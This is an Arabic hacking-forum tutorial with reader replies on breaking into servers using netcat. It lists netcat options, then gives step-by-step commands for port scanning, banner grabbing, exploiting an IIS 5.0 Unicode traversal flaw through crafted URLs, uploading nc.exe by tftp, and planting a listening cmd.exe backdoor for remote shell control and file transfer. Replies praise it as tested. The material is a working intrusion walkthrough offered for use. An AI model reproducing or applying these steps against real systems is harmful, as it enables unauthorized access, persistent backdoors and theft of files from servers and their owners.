اختراق السيرفرات بواسطة برنامج net cat ( للمحترفين و المتدئين )

[S4wDz]

رح نحكو الان عن موضوع خطير جدا اداة النت كات net cat والاختراق بواسطتها .
البرنامج اداه من ادوات الدوس , هي فالحقيقه موجوده فاليونكس , لكن يمكن انزلوها للويندوز والتعامل معها
النت كات عباره عن اداه قابلة للكتابة والقراءة عبر اتصالات الشبكات TCP و UDP .
ولها استخدامات كثيره جدا و خطيره , مثلا بورت سكان , التنصت على البورتات , والعمل باك دور .
لتحميل النت كات من هنا
[]
نشوف بعض اهم اوامر النت كات :

كود:

-e specifies a program to exec after
making/receiving a connection
-g gateway source-routing hop point[s], up to 8
-G num source-routing oiter: 4, 8, 12
-i secs delay interval for lines sent, ports scanned
-l listen mode for inbound connections
-n only accept numeric IP addresses, no DNS
-o file hex dump of traffic
-p port local port number
-r randomize
-s addr local source address
-t netcat will respond to telnet option negotiation
"this allows it to connect to a telnetd and
get past initial negotiation far enough to get
a login prompt from the server"
-u UDP connection mode
-v verbose mode
-w secs wait - timeout for connects
-z zero I/O mode [used for scanning]

For NT netcat, all of the above options exist, plus a few others.

-d detach - don't open a new DOS window
-L keep listening after the current session terminates

الان نحكو قليلا عن

طريق الاختراق بواسطة النت كات , والخطوات الي يجب ان نقوم بها :

-اولا البورت سكان :

تقدرتعمل سكان على البورتات عن طريق هذا الامر : nc –v –z 192.168.1.90 1-200
او الامر هذا : nc –v –w2 –z 192.168.1.90 1-200



هذا هو ايبي الجهاز او الموقع الي بدك باغي تدير عليه بورت سكان .
طبعا نطلعو تطلع ايبي الموقع عمل ping ,. مثلا : ping []
الامر W2 هذا لتحديد مدة الاتصال , مثلا انا اخترت ثانيتين , اذا ماصار تجاوب يروح على البورت الي بعده , اختصار للوقت .
1-200 هذي هي البورتات الي سوينا سكان بينهم , انا اخترت البورتات من 1 الى 200 .

شوفو النتئائج اللي طلعت لنا , بورت المتصفح والتلنت والاف تي بي وغيرهم . ومكتوب البورت مفتوح وله والو .

ثانيا الاتصال بالبورتات :

مثلا عندنا موقع وبدنا نطلع معلومات عنو , مثل المعلومات الي يعطينا اياها موقع []
بكل بساطه , نكتب الامر هذا : nc –v –n 192.168.1.90 80

معلومات عن البورت 21 و 80 , طلع انو الموقع شغال على ويندوز 2000

وعلى سيرفر IIS5.0 .و فيه ميكورسوفت FTP

هذي معلومات بتفيدنا في تحديد الهدف للاختراق .

الان نقدر نبدا بالتطبيق العملي ,و بنخترق الموقع .

بنخلي النت كات يفتح لنا باك دور في الموقع . طبعا لازم نحمل النت كات على الموقع

اول شي باه يفتح لنا الباك دور . كيف ؟
بما ان الموقع على سيرفر IIS5.0 , بنستخدم سكربتات اليونيكود الخطيره في رفعه .

كود PHP:

http://192.168.1.90/scripts/..%255c...md.exe?/c+dir+c 


لاستعراض محتويات الدرايف C , عن طريق المجلد Scripts

وطلعت لنا النتائج : ********s and Settings , Inetpub , Program Files , WINNT
الان بنرفع النت كات على سيرفر IIS
بنستخدم ال tftp , هذي الاداه مشابهه للاف تي بي , اكتب في الدوس tftp , اذا لازم تعرف المزيد عنها .
نرجع الى موضوعنا :



شوفو الاسكربت الي حطيناه هذي المره , نفس السكربت الاولي , لكن بدل امر الاستعراض dir , حطينا امر tftp , وطبقناه , هذي هي طريقه : TFTP [-i] host [GET | PUT] source [destination]
نحن في اختراقنا هذا الي عملناه : tftp –I 192.168.1.90 get nc.exe
طبعا في اسكربتات اليونيكود بدل المسافه نكتب +

كود:

c+tftp+-i+192.168.1.9+get+nc.exe

تصبح بهذا الشكل :

كود:

http:///c+TFTP+-i+192.168.1.9+GET+nc.exe

في برنامج رائع اسمه TFTPD32 , يطلع لك اذا النت كات انرفع بنجاح للسيرفر
[]



مليييييييييييييح بعد ما رفعنا النت كات وكل شي تمام , بدنا نخلي النت كات يفتح لنا باك دور (Back Door) .
مشان نخليه يفتح لنا الباك دور لازم نخليه فالاول يتنصت على بورت فالسيرفر , مثلا اخترت البورت 10001 , ومن بعد بنقدر نتصل بالبورت من جهازنا بستخدام النت كات .

مليييييييييييييح الان بنطبق امر التنصت من السيرفر , هذا هو الامر :

كود:

nc -L -p 10001 -d -e cmd.exe

نشرح شوي الاوامر هي الي كتبناها :
Nc : يخلي الويندوز يشغل النت كات nc.exe
-L : يخبر النت كات بان لا يغلق وان ينتظر الانتصال
-p : لتحديد البورت الي بنتصنت عليه .
-d : يخبر النت كات بالتصال بالبرنامج الي نريد ان نشغله
-e : يخبر النت كات بالبرنامج الي نريده ان يشتغل بعد الاتصال بالبورت .
طبعن نحن اخترنا الدوس cmd.exe
بنكتب الامر في سكربت اليونيكود , طبعن بيكون بهذا الشكل :
[CODEc+nc+-l+-p+10001+-d+-e+cmd.exe][/CODE]

النت كات تنصت على البورت 10001 , وفتح لنا باك دور على الدوس cmd.exe
هلا اجا دورنا , مشان نتصل من جهازنا على النت كات الي على السيرفر .

مثل ما ملاحظين , بعد ما اتصلنا بالبورت المتنصتين عليه 10001 ,
بالامر nc –v –n 192.168.1.90 10001

دخلنا على ملف scripts الي فالسيرفر , وطبقنا الامر ipconfig , والنتيجه انه طلع لنا ايبي السيرفر (^_^)
الان تمام صار عندنا تحكم بعيد على السيرفر .

نحوسو ننقل الملفات بواسطة النت كات , كيف ؟؟
نقدر عن طريق ال TFTP , لكن لازم نعملها مره ثانيه عن طريق اليونيكود , لكن علاه خلاص تعاملنا هلا مع النت كات وهو افضل وعندنا اتصال خارجي معاه .

اول شي امر استقبال او سحب ملف من السيرفر , مثلا اذا كان فالسيرفر ملف اسمه hack.txt , وبدنا نسحبو , بنطبق هذا الامر : nc –l –p 1234 >hack.txt
1234 هذا هو البورت الي بنستخدمو في سحب الملف .


واذا حبينا انا نرفع ملف للسيرفر , كيف ؟؟
عن طريق هذا الامر :

كود:

 nc 192.168.1.90 1234 <dz4all.txt , ^C

واي استفسار انشاءالله رانا هنا

[hacker almooot]

يعطيك الف عافية كل يوم تكبر بشي كبير مبدع تقبل مروري

[S4wDz]

صح فطورك مشكوووووووووووووووور اخي احمد هكر الموت

[MDMN EX-SHeLL]

مجهود رائع مشكور يالغالي

[algerie-hacker]

مشكووووور و مجربو 100%
:-)

[S4wDz]

مشكور علمرور حبيبي

[Th3 N!Nj4]

بارك الله فيك اخي